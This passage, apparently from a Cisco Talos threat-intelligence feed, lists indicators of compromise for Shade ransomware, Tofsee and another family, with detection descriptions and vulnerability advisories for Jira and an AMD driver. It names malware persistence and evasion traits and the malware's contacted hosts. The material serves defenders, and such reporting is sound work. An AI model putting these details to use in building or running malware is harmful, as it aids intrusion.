                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IDSVC
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
                Value Name: Type
                18
                MutexesOccurrences
                gazavat-svc18
                kkq-vx_mtx5218
                kkq-vx_mtx5318
                kkq-vx_mtx5418
                kkq-vx_mtx5518
                kkq-vx_mtx5618
                kkq-vx_mtx5718
                kkq-vx_mtx5818
                kkq-vx_mtx5918
                kkq-vx_mtx6018
                kkq-vx_mtx6118
                kkq-vx_mtx6218
                kkq-vx_mtx6318
                kkq-vx_mtx6418
                kkq-vx_mtx6518
                kkq-vx_mtx6618
                kkq-vx_mtx6718
                kkq-vx_mtx6818
                kkq-vx_mtx6918
                kkq-vx_mtx7018
                kkq-vx_mtx7118
                kkq-vx_mtx7218
                kkq-vx_mtx7318
                kkq-vx_mtx7418
                kkq-vx_mtx7518
                *See JSON for more IOCs
                Files and or directories createdOccurrences
                \MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\ckjgpiji.tmp18
                \MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\klncjook.tmp18
                \MSOCache\All Users\{91140000-0011-0000-0000-0000000FF1CE}-C\bglnccaf.tmp18
                \MSOCache\All Users\{91140000-0011-0000-0000-0000000FF1CE}-C\mnclgkoo.tmp18
                %CommonProgramFiles%\Microsoft Shared\MSInfo\kcndgmlj.tmp18
                %CommonProgramFiles%\Microsoft Shared\OFFICE14\cgcganec.tmp18
                %CommonProgramFiles%\Microsoft Shared\VSTO\10.0\pnpndocj.tmp18
                %CommonProgramFiles%\Microsoft Shared\ink\bafefhom.tmp18
                %CommonProgramFiles%\Microsoft Shared\ink\dnmejccm.tmp18
                %CommonProgramFiles%\Microsoft Shared\ink\ejlkpjei.tmp18
                %CommonProgramFiles%\Microsoft Shared\ink\fijffced.tmp18
                %CommonProgramFiles%\Microsoft Shared\ink\ghpbhbif.tmp18
                %CommonProgramFiles%\Microsoft Shared\ink\gkbpadmi.tmp18
                %CommonProgramFiles%\Microsoft Shared\ink\pnhochhl.tmp18
                %ProgramFiles%\DVD Maker\jaemdheq.tmp18
                %ProgramFiles%\Internet Explorer\geakanpm.tmp18
                %SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe18
                %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe18
                %System32%\alg.exe18
                %System32%\dllhost.exe18
                %System32%\ieetwcollector.exe18
                %System32%\msdtc.exe18
                %System32%\msiexec.exe18
                %System32%\snmptrap.exe18
                %System32%\sppsvc.exe18
                *See JSON for more IOCs

                File Hashes

                042fc31aadb0e0a33f91c9513ed9110d0c181de5b49f22614eb15ca759aabc58 07964288aebc5a85af04a534b2e795ded8c270466edfe2938cb5a7aae95fedee 2868317804d6a32158c492563f8cf121b0e714d116046f66323d49f7ea441f96 32084017ad00fe6e0ab45a804904363e3526f383cc78d35df55f66937b96f8fd 45414708db6a99c7fb927fcbc84861e55255a85e1583eaf661ef6226a880c525 53fd6b9b925d4cf2b143f057f11fa15659dd8d3e560aafa54148e87082e0aae7 69907401f98b32f51c11cd53b5149b29f8c4ecab38e08ca76188739f57e00431 6e3f1120e34aac4dea7bc87ce7a7185074841bc7077c2fa13a742f0ca53c81a3 6fa4177a1ee93669aa408db21de55d860d9792f6d544cf3510d4c121c95f5be0 749762f179e4c19d613a128150d3b82d1b0c138424ad3d436a77874a3392829e 79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006 91a4c230b121564208cbb629ddb79df79651738b2abd59c426b32e4dc4022f1d a24c20594273edfc118ccce5b7e82081240e9f6a3323818f7ac17d990170471d a52fdbfecc6455806e30f138c43f02186f91daf5fb032e62efd68e697322542f b2aac39e286f2172baa62b16555191a60d6c1d25d63f73de51d80d60f263db32 c367dd19b06798008ed520730d0c7e05f28645d4565de62969a318275b9e6cff de601aa4336e1ae644b7dcee10e0748cea30d70907b7e899ae39b364b56e181f e62cf47c56c9858faf8a344e9b468293b48069c0f1d47034fea06409e9c26644

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                Wsa N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Ransomware.Shade-7158472-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: xi
                71
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Client Server Runtime Subsystem
                71
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: xVersion
                71
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32 71
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION 71
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: shst
                50
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: sh1
                50
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: xstate
                50
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: xcnt
                50
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: xmode
                50
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: xpk
                50
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG
                Value Name: ExceptionRecord
                41
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
                Value Name: CleanShutdown
                32
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{509D0DCA-5840-11E6-A51E-806E6F6E6963}
                Value Name: Generation
                32
                <HKLM>\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&A27250A&0&2
                Value Name: CustomPropertyHwIdKey
                32
                <HKLM>\SYSTEM\CONTROLSET001\ENUM\USB\VID_46F4&PID_0001\1-0000:00:1D.7-2
                Value Name: CustomPropertyHwIdKey
                32
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{509D0DCA-5840-11E6-A51E-806E6F6E6963}
                Value Name: Data
                32
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5}
                Value Name: Data
                31
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5}
                Value Name: Generation
                31
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963}
                Value Name: Data
                31
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963}
                Value Name: Generation
                31
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
                Value Name: Data
                31
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
                Value Name: Generation
                31
                <HKLM>\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_1AF4&DEV_1001&SUBSYS_00021AF4&REV_00\3&2411E6FE&2&18
                Value Name: CustomPropertyHwIdKey
                31
                <HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
                Value Name: shsnt
                31
                MutexesOccurrences
                cversions.2.m30
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                128[.]31[.]0[.]3928
                193[.]23[.]244[.]24426
                86[.]59[.]21[.]3825
                131[.]188[.]40[.]18924
                194[.]109[.]206[.]21223
                154[.]35[.]32[.]522
                171[.]25[.]193[.]922
                76[.]73[.]17[.]19420
                104[.]18[.]35[.]13120
                208[.]83[.]223[.]3418
                104[.]16[.]154[.]3616
                104[.]16[.]155[.]3615
                104[.]18[.]34[.]13111
                51[.]68[.]204[.]1393
                46[.]166[.]182[.]203
                148[.]251[.]51[.]663
                51[.]68[.]206[.]283
                145[.]239[.]66[.]2362
                78[.]129[.]150[.]722
                144[.]76[.]57[.]1652
                137[.]74[.]19[.]2022
                37[.]157[.]254[.]1132
                136[.]243[.]176[.]1482
                69[.]30[.]219[.]822
                62[.]210[.]157[.]1332
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                whatismyipaddress[.]com31
                opengraphprotocol[.]org31
                wsrs[.]net31
                whatsmyip[.]net31
                cmsgear[.]com31
                luminati[.]io31
                redirme[.]com31
                Files and or directories createdOccurrences
                %ProgramData%\Windows\csrss.exe71
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859862[[fn=Urban Pop]].thmx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859865[[fn=Kilter]].thmx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859866[[fn=Macro]].thmx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01859868[[fn=Thermal]].thmx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01972873[[fn=Summer]].thmx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455519[[fn=Winter]].thmx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455596[[fn=Spring]].thmx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM02455610[[fn=Autumn]].thmx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793058[[fn=Median]].dotx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793064[[fn=Equity]].dotx50
                %APPDATA%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx50
                %APPDATA%\Microsoft\Templates\Normal.dotm50
                %APPDATA%\Microsoft\UProof\CUSTOM.DIC50
                %APPDATA%\Mozilla\Firefox\profiles.ini50
                \README1.txt50
                \README10.txt50
                \README2.txt50
                \README3.txt50
                \README4.txt50
                \README5.txt50
                \README6.txt50
                \README7.txt50
                \README8.txt50
                *See JSON for more IOCs

                File Hashes

                00591b03aa2be7dc7e67fa04a5da57bb803a2b4bc008fd7df40feadb72d2f00d 00953fe490792ae76ab5a584513a0ab3c460bcaa4fbb08f88ea5f0a261c44eab 018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6 01b2c4dd09be08a0db5cd266c2b0f4ae01ab920c6647910de820eb9cf82d55d4 01dea6848c96188f53d6e90977326b3562a2fcc30bd84c3d0e67880d6d4b8c50 02146af20bcaec9dbf6f30071791e73c7fd4eac6657f3b9d3159a6f663764250 025207f8e1551eb8156dd759426d57b2cbb42ce7b65479f071b7ffe8d0d03479 02b34490a5a4688b754dbb9be6507330ae88dfbc911f5c09e9e9e7c7ef10f2c5 02bf9968e18495581c271d4110a7bbaaf3889043c93af10357cb10499c8950a7 0616e6bc594dea95fad720bc966573921d9f2ec92eddcf665975227776e07fd6 0644b301b6414d2fe97644ae926849252c7a33607f2288253e9e53c5afd5c476 067cc19af3565e37da3bc0189210ad87ad111faf2a4c845f01fca036e3da912b 068491e6b7b02d7fef9a4778862886565795765b28b3c8f72f0d7adebc0b0a47 06a02b8b9e4871d0e558818a259dc6b6fcd0789b3d6a0f1c35dfaf90a8fc33f6 072a786d43860a9b5c2d4b49c1228ba651fad80e812eccd3e698d0f7b1b3adae 0769d0046146bd19aa118706ac9a470575139f06479c2781b680b5d8b92cce05 093bc279dcf1d7ee9a194af8e1e323b9ebe94f8a59a6dbbed8e82ca552c4dcb2 09483603bc66291e19444d644a5627416fb09d097b2a5efac0755c957cf7aedd 0c244b7cf8841885f0fecb184610c80ff3b3f6015e86f50ce35023383396dbf2 0c703b45991e6b99d4d4155af6437c5e255d7e52af06a2c9a29a3391774e4ae7 0d35cc4470e1f4493c8a9919769a9069a7deae2ee6ced8bd8ef0040c934a57f9 0d7531dc6587e8d9f9e3eae58e803b4aafd6d35927e7d48cc0a730cdc98a89d0 0df9f6f2d26051ba29c79a61f46e482d0cd61bb20a699cc7937e2f52f4d20fca 0e1f57431d814b1383b0202f10cdc0e929bd17d7788dc04e5d99b5f60761484e 0e21c68614126c9afae8a7747af154fdd254def83795bdb4033cb5a50de80026
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WsaThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Packed.Tofsee-7150793-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                Value Name: Config3
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: ErrorControl
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: DisplayName
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: WOW64
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: ObjectName
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: Description
                18
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                Value Name: Config0
                18
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                Value Name: Config1
                18
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                Value Name: Config2
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                Value Name: ImagePath
                12
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\cvjpowcr
                4
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES 3
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\haoutbhw
                2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\wpdjiqwl
                2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\mftzygmb
                2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\unbhgouj
                1
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\ibpvucix
                1
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\exlrqyet
                1
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\tmagfnti
                1
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\lesyxfla
                1
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\slzfemsh
                1
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\yrflksyn
                1
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                239[.]255[.]255[.]25018
                69[.]55[.]5[.]25018
                172[.]217[.]3[.]10018
                46[.]4[.]52[.]10918
                176[.]111[.]49[.]4318
                85[.]25[.]119[.]2518
                144[.]76[.]199[.]218
                144[.]76[.]199[.]4318
                43[.]231[.]4[.]718
                192[.]0[.]47[.]5918
                95[.]181[.]178[.]1718
                173[.]194[.]207[.]2716
                216[.]146[.]35[.]3515
                213[.]205[.]33[.]6314
                172[.]217[.]197[.]2614
                208[.]76[.]51[.]5113
                208[.]76[.]50[.]5013
                148[.]163[.]156[.]112
                64[.]233[.]186[.]2612
                208[.]71[.]35[.]13711
                172[.]217[.]5[.]22811
                67[.]231[.]154[.]16211
                209[.]85[.]203[.]2711
                199[.]5[.]26[.]4610
                199[.]5[.]157[.]13110
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                250[.]5[.]55[.]69[.]in-addr[.]arpa18
                250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org18
                250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org18
                250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net18
                whois[.]iana[.]org18
                250[.]5[.]55[.]69[.]bl[.]spamcop[.]net18
                whois[.]arin[.]net18
                250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org18
                microsoft-com[.]mail[.]protection[.]outlook[.]com18
                honeypus[.]rusladies[.]cn18
                marina99[.]ruladies[.]cn18
                sexual-pattern3[.]com18
                coolsex-finders5[.]com18
                smtp[.]secureserver[.]net15
                super-efectindating3[.]com13
                ipinfo[.]io12
                mx1[.]emailsrvr[.]com12
                mx0a-001b2d01[.]pphosted[.]com12
                mx-aol[.]mail[.]gm0[.]yahoodns[.]net11
                etb-1[.]mail[.]tiscali[.]it10
                mta5[.]am0[.]yahoodns[.]net9
                mx-eu[.]mail[.]am0[.]yahoodns[.]net9
                eur[.]olc[.]protection[.]outlook[.]com9
                aol[.]com9
                hotmail-com[.]olc[.]protection[.]outlook[.]com9
                *See JSON for more IOCs
                Files and or directories createdOccurrences
                %SystemRoot%\SysWOW64\config\systemprofile18
                %SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>18
                %TEMP%\<random, matching '[a-z]{8}'>.exe18
                %System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)11
                %SystemRoot%\SysWOW64\config\systemprofile:.repos3
                %TEMP%\supvobl.exe1

                File Hashes

                1599aff065e6687acafc61a6f572652d1a0f7a0b17e3a71ca32fe848f2dc2732 1f8ca64991ba709a857f0dcd5bc5d6e9b0885ebc929989f03be3dfb58ecf9ce0 2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac 4368a7bb048f1ba83bbd8430b2f49cb566cd69642ed3e9de3675f69533125b29 471c51b4340ed0091aeaf0402f762230689951e448f703033ed4bd1f2fb7a7d6 5195a9a5a3094c3735668216461d2be638152ae0738dab4d8a9295b697bc567c 675f23d881b4685a171767073e01f889ddeb879af7036fde7bcf341f33699da5 8092a1a1db9009435d1177afdef7fb7334e090b8d1b2f5c3e4d121ac0c110cbb 8120184d0a6340d01c5226d28747a2da5c81ef323e126df5a92ff9ada41b5c42 86cf3a207714ea953fb6834643b68064b912c077d44c31b9ed287feab0bc0e4a 8baff9107ff5c48ed53d633fe18f039d3cdd30eedcf05e55b4c467f9f9aed831 9c8275a2d03edd430e8263980a2c31106ab7116e40b93bead7108c6ed97e29fc a3e921ece8ec6a501dbb88c78fea54e2bd15e46b22cb61abced99973c70cf6f8 c2606f0413239f1c60cccd260374e6b88694718af0389be6d173a5c466e7d819 c2a86711660f12b21a7f3fe3fde6b7f07faeb486111d71e34abc27f90f31b415 c94a846dc45a26b4d3869ac32de34aa780720d4cd21743847bb87a2da4a14a8b d7d152e0dc028976050dbace9078c99feddce0f805c1892b4f1ac92feaf5fe15 dae992cf09f4681239e858e69eebfff7e35786069d7719482ccbb15615ec7a7e

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WsaThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Exploit Prevention

                Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                CVE-2019-0708 detected - (7002)
                An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                Madshi injection detected - (2740)
                Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
                Kovter injection detected - (1860)
                A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                Process hollowing detected - (1503)
                Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                Trickbot malware detected - (1131)
                Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
                Gamarue malware detected - (205)
                Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                Installcore adware detected - (128)
                Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                Excessively long PowerShell command detected - (95)
                A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
                PowerShell file-less infection detected - (89)
                A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
                Fusion adware detected - (41)
                Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.

                Vulnerability Spotlight: Multiple vulnerabilities in Atlassian Jira

                $
                0
                0

                Ben Taylor of Cisco ASIG discovered these vulnerabilities.

                Atlassian’s Jira software contains multiple vulnerabilities that could allow an attacker to carry out a variety of actions, including the disclosure of sensitive information and the remote execution of JavaScript code. Jira is a piece of software that allows users to create, manage and organize tasks and manage projects. These bugs could create a variety of scenarios, including the ability to execute code inside of Jira and the disclosure of information inside of tasks created in Jira, including attached documents.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlassian to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Atlassian Jira WikiRenderer parser XSS vulnerability (TALOS-2019-0833/CVE-2019-8444)

                An exploitable XSS vulnerability exists in the WikiRenderer functionality of Atlassian Jira, from version 7.6.4 to 8.1.0. A specially crafted comment can cause a persistent XSS. An attacker can create a comment or worklog entry to trigger this vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira CSRF login vulnerability (TALOS-2019-0834)

                An exploitable CSRF vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. The login form doesn't require a CSRF token. As a result, an attacker can log a user into the system under an unexpected account.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira CSRF login vulnerability (TALOS-2019-0835/CVE-2019-14998)

                An exploitable CSRF vulnerability exists in Atlassian Jira 7.6.4. An attacker controlling a subdomain different that the Jira hosting subdomain enables cookie injection and control of the CSRF header token. An attacker can create a cookie and submit CSRF attacks on behalf of a logged-in user to trigger this vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira Issue key information disclosure vulnerability (TALOS-2019-0836/CVE-2019-14995

                An issue key information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid issue keys and invalid issue keys via the `/rest/api/1.0/render` API endpoint.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira issue attachment name information disclosure vulnerability (TALOS-2019-0837/CVE-2019-14995)

                An issue attachment name information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid attachment names and invalid attachment names for any given issue via `/rest/api/1.0/render` API endpoint.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira Tempo plugin issue summary information disclosure vulnerability (TALOS-2019-0838/CVE-2019-5095)

                An issue summary information disclosure vulnerability exists in Atlassian Jira Tempo plugin, version 4.10.0. Authenticated users can obtain the summary for issues they do not have permission to view via the Tempo plugin.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira issueTable username information disclosure vulnerability (TALOS-2019-0839/CVE-2019-XXXX)

                A username information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid usernames and invalid usernames via `/rest/issueNav/1/issueTable` API endpoint.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira worklog information disclosure vulnerability (TALOS-2019-0840/CVE-2019-XXXX)

                A worklog information disclosure vulnerability exists in Atlassian Jira, versions 7.6.4 to 8.1.0. Authenticated users can view worklog details for issues they do not have permission to view via the `/rest/api/2/worklog/list` API endpoint. They can also obtain a list of worklog ID's via `/rest/api/2/worklog/updated`.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that versions 7.6.4 through 8.1.0 of Atlassian Jira are affected by these vulnerabilities.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 50110, 50111, 50114

                Vulnerability Spotlight: AMD ATI Radeon ATIDXX64.DLL shader functionality remote code execution vulnerability

                $
                0
                0

                Piotr Bania of Cisco Talos discovered this vulnerability.

                Some AMD Radeon cards contain a remote code execution vulnerability in their ATIDXX64.DLL driver. AMD produces the Radeon line of hardware, which includes graphics cards and graphics processing units. This specific vulnerability exists on the Radeon RX 550 and the 550 Series while running VMWare Workstation 15. An attacker could exploit this vulnerability by supplying a malformed pixel shared inside the VMware guest operating system to the driver. This could corrupt memory in a way that would allow the attacker to gain the ability to remotely execute code on the victim machine.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                AMD ATI Radeon ATIDXX64.DLL shader functionality remote code execution vulnerability (TALOS-2019-0818/CVE-2019-5049)

